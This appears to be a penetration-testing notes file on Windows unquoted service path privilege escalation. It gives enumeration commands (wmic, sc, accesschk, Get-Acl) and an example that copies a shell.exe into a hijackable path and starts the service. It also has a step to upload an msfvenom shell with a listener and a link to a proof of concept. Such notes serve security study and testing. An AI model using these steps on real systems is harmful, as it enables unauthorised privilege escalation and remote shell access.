2021-10-16 00:40:15 +02:00
# Unquoted Path
* Path to a service without quotes can be hijacked by inserting other executables and services into the path.
2021-10-23 02:03:06 +02:00
* Some part of path has to be writeable, windows tries to insert `.exe` instead of a space.
* Check services via `wmic service get name,displayname,pathname,startmode` and `sc qc <servicename>`
* Check permissions on paths via `.\accesschk64.exe /accepteula -uwdq "C:\Service Path\"`
2022-04-14 01:06:16 +02:00
## Enumeration
* Check paths
```sh
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
```
* Check permissions on these paths
```
cacls "c:\program files\directory"
powershell -c "Get-WMIObject -Class Win32_Service -Filter \"Name='< service name > '\" | select-object *"
```
2021-10-16 00:40:15 +02:00
## Example
2022-04-14 01:06:16 +02:00
* The unquoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
2021-10-16 00:40:15 +02:00
```sh
copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
```
```sh
net start < service >
```
2022-02-26 01:01:44 +01:00
## Intel about Service
* Access should contain writeable
```sh
Get-Acl -Path < path > | Format-List
```
* Save the script [Get-ServiceAcl.ps1 ](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/ ) and `Import-Module Get-ServiceAcl.ps1`
* Check `ServiceRights` via
```sh
"< servicename > " | Get-ServiceAcl | select ExpandProperty Access
```
## Interacting with the Service
* Upload msfvenom shell to the writeable path, setup listener and
```sh
sc start "servicename"
Stop-Service -name "servicename"
Start-Service -name "servicename"
```
2022-04-14 01:06:16 +02:00
## PoC
* [MattyMcFatty's PoC ](https://github.com/mattymcfatty/unquotedPoC.git )
2022-02-26 01:01:44 +01:00